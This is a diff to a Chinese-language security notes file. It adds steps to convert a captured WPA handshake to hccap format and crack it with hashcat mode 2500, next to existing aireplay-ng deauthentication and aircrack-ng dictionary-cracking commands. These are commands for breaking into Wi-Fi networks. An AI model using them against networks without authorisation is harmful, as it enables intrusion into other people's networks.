--- a/网络安全.md
+++ b/网络安全.md
@@ -112,6 +112,10 @@ aireplay-ng -a *:*:*:*:*:* -c *:* -0 90 wlan0mon
 # 破解密码
 aircrack-ng -b *:*:*:*:*:* -w password.txt *.cap
    # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
+# 把cap转换成hccap
+aircrack-ng handshake-01.cap -J handshake-01
+# 用hashcat破解密码 “参数: -m 2500 模式WPA/PSK”
+hashcat -m 2500 handshake-01.hccap password.txt
 
 # 停止无线网卡监听模式
 airmon-ng stop wlan0mon
